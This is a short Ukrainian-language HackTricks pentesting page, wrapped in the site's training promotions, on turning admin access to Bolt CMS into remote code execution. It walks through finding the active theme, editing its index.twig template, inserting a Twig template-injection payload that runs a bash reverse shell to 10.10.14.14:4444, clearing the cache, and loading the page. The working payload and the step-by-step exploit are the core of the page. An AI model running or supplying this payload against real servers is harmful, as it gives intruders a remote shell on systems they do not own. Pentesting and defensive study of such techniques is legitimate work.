Bolt CMS
Reading time: 2 minutes
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
RCE
Після входу як адміністратор (перейдіть на /bot для доступу до форми входу), ви можете отримати RCE в Bolt CMS:
- Виберіть
Configuration
->View Configuration
->Main Configuration
або перейдіть за URL-адресою/bolt/file-edit/config?file=/bolt/config.yaml
- Перевірте значення теми
.png)
- Виберіть
File management
->View & edit templates
- Виберіть базову тему, знайдену на попередньому (
base-2021
в даному випадку) кроці, і виберітьindex.twig
- У моєму випадку це за URL-адресою /bolt/file-edit/themes?file=/base-2021/index.twig
- Вставте ваш payload у цей файл через template injection (Twig), наприклад:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
- І збережіть зміни
.png)
- Очистіть кеш у
Maintenance
->Clear the cache
- Знову отримайте доступ до сторінки як звичайний користувач, і payload має бути виконано
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.